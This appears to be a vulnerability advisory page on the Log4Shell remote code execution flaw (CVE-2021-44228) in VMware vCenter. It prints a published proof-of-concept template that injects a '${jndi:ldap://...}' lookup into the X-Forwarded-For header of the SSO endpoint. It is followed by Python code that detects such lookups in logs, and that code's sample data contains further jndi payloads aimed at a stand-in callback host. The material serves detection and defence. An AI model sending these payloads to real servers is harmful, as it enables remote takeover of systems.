VMware VCenter is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
PoC code [published]
id: vmware-vcenter-log4j-jndi-rce-temp
info:
  name: VMware VCenter - Remote Code Execution (Apache Log4j)
  author: _0xf4n9x_
  severity: critical
  verified: true
  description: |
    VMware VCenter is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  reference:
    - https://www.vmware.com/security/advisories/VMSA-2021-0028.html
    - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
    - https://twitter.com/tnpitsecurity/status/1469429810216771589
    - https://logging.apache.org/log4j/2.x/security.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
  tags: cve,cve2021,rce,jndi,log4j,vcenter,vmware
  created: 2023/07/02
set:
  oob: oob()
  oobDNS: oob.DNS
rules:
  r0:
    request:
      method: GET
      path: /websso/SAML2/SSO/vsphere.local?SAMLRequest=
      headers:
        X-Forwarded-For: "${jndi:ldap://{{oobDNS}}}"
    expression: oobCheck(oob, oob.ProtocolDNS, 3)
expression: r0()
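The template above probes the /websso endpoint by placing a Log4j lookup string in the X-Forwarded-For header and waiting for the DNS callback. The defensive counterpart, added here as example code that is not part of the template or the original page, scans web-access log lines for that pattern: any Log4j lookup syntax (${...}) in a client-supplied header is flagged, and the jndi: lookup abused by CVE-2021-44228 is marked explicitly. The log line format, client addresses and callback hostname are constructed for the example.

```python
from __future__ import annotations
import re
from typing import Iterable, List, NamedTuple

# Log4j lookup syntax is ${...}. Any occurrence inside an attacker-controlled
# header value deserves an alert, whatever the lookup names.
LOOKUP_RE = re.compile(r"\$\{[^}]*\}")
# The specific lookup behind CVE-2021-44228, matched case-insensitively.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed log format (assumption for this example):
#   <client> <METHOD> <path> "<Header>: <value>" "<Header>: <value>" ...
LOG_LINE_RE = re.compile(
    r'^(?P<client>\S+) (?P<method>[A-Z]+) (?P<path>\S+)(?P<headers>(?: "[^"]*")*)$'
)
HEADER_RE = re.compile(r'"([^":]+): ([^"]*)"')


class Finding(NamedTuple):
    line_no: int
    client: str
    path: str
    header: str
    value: str
    jndi: bool  # True when the lookup is the jndi: variant


def scan_log(lines: Iterable[str]) -> List[Finding]:
    """Return one Finding per header value that carries Log4j lookup syntax."""
    findings: List[Finding] = []
    for line_no, line in enumerate(lines, 1):
        m = LOG_LINE_RE.match(line.strip())
        if not m:
            continue  # not in the expected format; skip rather than guess
        for name, value in HEADER_RE.findall(m["headers"]):
            if LOOKUP_RE.search(value):
                findings.append(Finding(line_no, m["client"], m["path"], name,
                                        value, bool(JNDI_RE.search(value))))
    return findings


# Constructed sample: one probe of the vCenter SSO path via X-Forwarded-For,
# one benign request, one probe carried in User-Agent instead.
SAMPLE_LOG = """\
203.0.113.7 GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= "X-Forwarded-For: ${jndi:ldap://oob.example.invalid/a}" "User-Agent: curl/7.68.0"
198.51.100.2 GET /ui/ "User-Agent: Mozilla/5.0" "X-Forwarded-For: 198.51.100.9"
203.0.113.7 GET /websso/SAML2/SSO/vsphere.local "User-Agent: ${JNDI:dns://oob.example.invalid}"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"line {f.line_no}: {f.client} -> {f.path} [{f.header}] jndi={f.jndi}")
```

Running the block on the sample prints two findings: the X-Forwarded-For probe on line 1 and the User-Agent probe on line 3; the benign line 2 is silent.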